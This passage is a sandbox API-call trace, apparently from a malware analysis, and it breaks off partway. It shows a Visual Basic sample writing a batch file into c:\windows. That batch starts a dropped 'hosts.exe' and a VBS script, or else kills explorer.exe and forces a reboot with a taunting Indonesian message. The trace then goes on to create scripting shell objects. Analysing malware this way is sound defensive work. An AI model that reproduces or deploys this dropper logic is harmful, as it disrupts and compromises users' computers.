cchWideChar=1 | out: lpWideCharStr="b") returned 1 [0084.713] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.713] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0084.713] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.713] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0084.713] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.713] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0084.714] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.714] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0084.714] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.714] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0084.714] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.714] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0084.714] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.714] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0084.715] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.715] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0084.715] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.715] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Q", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="Q") returned 1 [0084.715] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.715] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=",", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr=",") returned 1 [0084.715] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.716] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0084.716] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.716] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0084.716] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.716] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0084.716] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.716] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe3ef24, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0084.717] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.717] VarSub (in: pvarLeft=0x28f5a8, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe56f44, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0084.717] VarCat (in: pvarLeft=0x28f4ec, pvarRight=0x28f568, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.717] GetFullPathNameA (in: lpFileName="c:\\windows\\W_X_C.bat", nBufferLength=0x104, lpBuffer=0x28f060, lpFilePart=0x28ef28 | out: lpBuffer="c:\\windows\\W_X_C.bat", lpFilePart=0x28ef28*="W_X_C.bat") returned 0x14 [0084.718] CreateFileA (lpFileName="c:\\windows\\W_X_C.bat" (normalized: "c:\\windows\\w_x_c.bat"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x28f020, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0084.770] GetFileType (hFile=0x15c) returned 0x1 [0084.770] IMalloc:Alloc (This=0x76da66bc, cb=0x250) returned 0xe57d50 [0084.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="@echo off", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0084.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="@echo off", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0084.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="@echo off", cchWideChar=9, lpMultiByteStr=0xe56ef4, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="@echo off", lpUsedDefaultChar=0x0) returned 9 [0084.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0084.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0xe56ef4, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 2 [0084.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="if not exist C:\\windows\\hosts.exe goto NOFILE", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0084.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="if not exist C:\\windows\\hosts.exe goto NOFILE", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0084.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="if not exist C:\\windows\\hosts.exe goto NOFILE", cchWideChar=45, lpMultiByteStr=0xe36d44, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="if not exist C:\\windows\\hosts.exe goto NOFILE", lpUsedDefaultChar=0x0) returned 45 [0084.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0084.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0xe56ef4, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 2 [0084.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="@start C:\\windows\\hosts.exe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0084.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="@start C:\\windows\\hosts.exe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0084.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="@start C:\\windows\\hosts.exe", cchWideChar=27, lpMultiByteStr=0xe3b77c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="@start C:\\windows\\hosts.exe", lpUsedDefaultChar=0x0) returned 27 [0084.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0084.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0xe56ef4, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 2 [0084.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="@start W_X_C.vbs", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0084.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="@start W_X_C.vbs", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0084.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="@start W_X_C.vbs", cchWideChar=16, lpMultiByteStr=0xe56ef4, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="@start W_X_C.vbs", lpUsedDefaultChar=0x0) returned 16 [0084.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0084.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0xe56ef4, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 2 [0084.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="@exit", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0084.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="@exit", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0084.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="@exit", cchWideChar=5, lpMultiByteStr=0xe56ef4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="@exit", lpUsedDefaultChar=0x0) returned 5 [0084.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0084.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0xe56ef4, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 2 [0084.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":NOFILE", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0084.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":NOFILE", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0084.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":NOFILE", cchWideChar=7, lpMultiByteStr=0xe56ef4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":NOFILE", lpUsedDefaultChar=0x0) returned 7 [0084.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0084.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0xe56ef4, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 2 [0084.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TASKKILL -F -IM EXPLORER.EXE", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0084.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TASKKILL -F -IM EXPLORER.EXE", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0084.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TASKKILL -F -IM EXPLORER.EXE", cchWideChar=28, lpMultiByteStr=0xe3b77c, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TASKKILL -F -IM EXPLORER.EXE", lpUsedDefaultChar=0x0) returned 28 [0084.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0084.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0xe56ef4, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 2 [0084.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SHUTDOWN -f -r -c \"/ PS:By.W_X_C.01 /PS: Kamu telah mengusik & mengganggu keberadaan-Q,Teruslah berjuang,Q hanya mencoba membantu anda keluar dari masa-masa sulit anda, so....\"", cchWideChar=176, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 176 [0084.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SHUTDOWN -f -r -c \"/ PS:By.W_X_C.01 /PS: Kamu telah mengusik & mengganggu keberadaan-Q,Teruslah berjuang,Q hanya mencoba membantu anda keluar dari masa-masa sulit anda, so....\"", cchWideChar=176, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 176 [0084.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SHUTDOWN -f -r -c \"/ PS:By.W_X_C.01 /PS: Kamu telah mengusik & mengganggu keberadaan-Q,Teruslah berjuang,Q hanya mencoba membantu anda keluar dari masa-masa sulit anda, so....\"", cchWideChar=176, lpMultiByteStr=0xe5562c, cbMultiByte=176, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHUTDOWN -f -r -c \"/ PS:By.W_X_C.01 /PS: Kamu telah mengusik & mengganggu keberadaan-Q,Teruslah berjuang,Q hanya mencoba membantu anda keluar dari masa-masa sulit anda, so....\"", lpUsedDefaultChar=0x0) returned 176 [0084.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0084.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0xe56ef4, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 2 [0084.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="@exit", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0084.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="@exit", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0084.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="@exit", cchWideChar=5, lpMultiByteStr=0xe56ef4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="@exit", lpUsedDefaultChar=0x0) returned 5 [0084.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0084.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0xe56ef4, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 2 [0084.779] WriteFile (in: hFile=0x15c, lpBuffer=0xe57d88*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x28ecec, lpOverlapped=0x0 | out: lpBuffer=0xe57d88*, lpNumberOfBytesWritten=0x28ecec*=0x150, lpOverlapped=0x0) returned 1 [0084.781] CloseHandle (hObject=0x15c) returned 1 [0084.782] IMalloc:Free (This=0x76da66bc, pv=0xe57d50) [0084.841] CLSIDFromProgIDEx (in: lpszProgID="scripting.filesystemobject", lpclsid=0x28f210 | out: lpclsid=0x28f210*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0 [0084.841] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0084.841] CoCreateInstance (in: rclsid=0x28f210*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x7295a460*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28f2b4 | out: ppv=0x28f2b4*=0x1072d28) returned 0x0 [0084.841] FileSystemObject:IUnknown:QueryInterface (in: This=0x1072d28, riid=0x72970540*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x28f2c4 | out: ppvObject=0x28f2c4*=0x0) returned 0x80004002 [0084.841] FileSystemObject:IUnknown:QueryInterface (in: This=0x1072d28, riid=0x72970750*(Data1=0x37d84f60, Data2=0x42cb, Data3=0x11ce, Data4=([0]=0x81, [1]=0x35, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xb8, [7]=0x51)), ppvObject=0x28f2c8 | out: ppvObject=0x28f2c8*=0x0) returned 0x80004002 [0084.841] FileSystemObject:IUnknown:QueryInterface (in: This=0x1072d28, riid=0x72970450*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28f294 | out: ppvObject=0x28f294*=0x1072d28) returned 0x0 [0084.841] FileSystemObject:IUnknown:Release (This=0x1072d28) returned 0x1 [0084.842] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x1072d28, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f260*="getspecialfolder", cNames=0x1, lcid=0x409, rgDispId=0x28f264 | out: rgDispId=0x28f264*=10014) returned 0x0 [0084.842] FileSystemObject:IDispatch:Invoke (in: This=0x1072d28, dispIdMember=10014, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f234*(rgvarg=([0]=0x28f2bc*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f4bc, pExcepInfo=0x28f214, puArgErr=0x28f244 | out: pDispParams=0x28f234*(rgvarg=([0]=0x28f2bc*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f4bc*(varType=0x9, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x1072c3c, varVal2=0x0), pExcepInfo=0x28f214*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f244*=0x72a478d9) returned 0x0 [0084.843] FileSystemObject:IUnknown:AddRef (This=0x1072c3c) returned 0x3 [0084.844] FileSystemObject:IUnknown:Release (This=0x1072c3c) returned 0x2 [0084.844] CLSIDFromProgIDEx (in: lpszProgID="Wscript.Shell", lpclsid=0x28f210 | out: lpclsid=0x28f210*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0 [0084.847] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0084.847] CoCreateInstance (in: rclsid=0x28f210*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x7295a460*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28f2b4 | out: ppv=0x28f2b4*=0x1072de4) returned 0x0 [0084.875] WshShell:IUnknown:QueryInterface (in: This=0x1072de4, riid=0x72970540*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x28f2c4 | out: ppvObject=0x28f2c4*=0x0) returned 0x80004002 [0084.875] WshShell:IUnknown:QueryInterface (in: This=0x1072de4, riid=0x72970750*(Data1=0x37d84f60, Data2=0x42cb, Data3=0x11ce, Data4=([0]=0x81, [1]=0x35, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xb8, 